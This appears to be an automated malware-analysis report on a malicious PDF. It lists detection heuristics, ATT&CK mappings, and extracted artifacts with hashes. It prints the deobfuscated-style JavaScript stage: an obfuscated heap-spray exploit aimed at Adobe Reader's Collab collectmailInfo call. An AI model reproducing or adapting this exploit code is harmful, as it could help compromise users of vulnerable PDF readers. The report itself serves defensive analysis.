Verdict: MALICIOUS
Risk Score: 178
Malware Insights
MITRE ATT&CK: T1059.001 PowerShell; T1204.002 Malicious File
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The EXTRACTED_FILE_STATIC_TRIAGE heuristic flags this JavaScript as suspicious due to hex escape obfuscation and high-entropy content. This suggests the script is designed to download and execute a secondary payload, a common technique for malware delivery. No specific family could be identified.
Machine Learning
- Nyx PDF Classifier: malicious score 0.9980
Heuristics (8)
- JavaScript action (low; 2 related findings) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Obfuscated multi-stage PDF JavaScript heap-spray exploit (critical) PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY: PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
- Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage (high) PDF_GENERIC_STAGE_RECOVERY: Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Suspicious extracted artifact (medium) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded file (low) PDF_EMBEDDED: PDF embeds a file attachment; it could carry an executable or another weaponised document as a nested payload.
- Object number defined twice with different bodies (info) PDF_DUPLICATE_OBJ_BODY_INCREMENTAL: The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in PDF document text)
  - http://ns.adobe.com/pdf/1.3/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/ (in PDF document text)
  - http://purl.org/dc/elements/1.1/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/mm/ (in PDF document text)
Extracted artifacts (3)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| k1 | pdf-embedded-file | PDF EmbeddedFile object 26 at offset 0x1EC1 | 1206312 bytes | d5005e6ee2e649716afeda73fc5624d60ddac2ec2e3497a03f11116991a6a4e7 | ClamAV: No threats found. Obfuscation or payload: likely. Carved artifact entropy is 8.00, consistent with packed or encrypted content. |
| javascript_obj0031_000.js | pdf-javascript-stream | PDF /JS object 31 at offset 0x12B202 | 13124 bytes | b4bf3c327495a1779930487dbfa9ecc600cd335bd59fb3705d5de3f6543bdc25 | ClamAV: No threats found. Obfuscation or payload: likely. Carved artifact contains 2 long base64-like blob(s) and 1 long hex-escaped blob(s). |
Preview script for javascript_obj0031_000.js (first 1,000 lines of the extracted script):
var ahfdhfeiuiofifafjkafahfhdlfadafh=unescape;
var o ="";
for (asdfafjiaehruiuifjkfnznashdkalfnhdsfj=128;asdfafjiaehruiuifjkfnznashdkalfnhdsfj>=0;--asdfafjiaehruiuifjkfnznashdkalfnhdsfj) o += ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x754943\x25\x759f93");
JpeKAFDjrTfdKIERlblJLAmY = o + QazWSxeDCrFVtGBUjnIkmOIuplM;
fhwpbcVvadNUtmvSVbaNLbnkoRXYJU = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x754943\x25\x759f93");
NGwa = 20;
MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV = NGwa+JpeKAFDjrTfdKIERlblJLAmY.length
while (fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length<MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV) fhwpbcVvadNUtmvSVbaNLbnkoRXYJU+=fhwpbcVvadNUtmvSVbaNLbnkoRXYJU;
sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU["substring"](0, MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU["substring"](0, fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length-MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
while(sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi.length+MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV < 0x40000) sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl;
var dakslfjaljfklasfjasdlk = Array;
afsdfasfcxzfcsdagfdgfgfasdfafacadf = new dakslfjaljfklasfjasdlk();
for(afdadfcznzmzhczjncafahfjkasdhfjkdfh=0;afdadfcznzmzhczjncafahfjkasdhfjkdfh<300;afdadfcznzmzhczjncafahfjkasdhfjkdfh++) afsdfasfcxzfcsdagfdgfgfasdfafacadf[afdadfcznzmzhczjncafahfjkasdhfjkdfh] = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi + JpeKAFDjrTfdKIERlblJLAmY;
var iJCYnMqYfdUqJybccHmtjpgocdxIgC = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x75\x30c\x30c\x25\x750c0c");
while(iJCYnMqYfdUqJybccHmtjpgocdxIgC.length < 0x1200) iJCYnMqYfdUqJybccHmtjpgocdxIgC =iJCYnMqYfdUqJybccHmtjpgocdxIgC+iJCYnMqYfdUqJybccHmtjpgocdxIgC;
var adfafasdffsfsdfdfvcvv = Collab;
var dfzfddfgfgasfasddcacs = this;
dfzfddfgfgasfasddcacs.collabStore = adfafasdffsfsdfdfvcvv["collectmailInfo"]({subj: "",msg: iJCYnMqYfdUqJybccHmtjpgocdxIgC});

| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery (split-literal-normalize) from JavaScript object 31 at offset 0x12B202 | 7664 bytes | 1b2a07898f77324d3b79e6ffc3fe410cb48c595030879d8f14b2c380c1b2aba6 | ClamAV: No threats found. Obfuscation or payload: likely. 12 of 24 identifiers look randomly generated (e.g. 'MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKooui'), consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s). |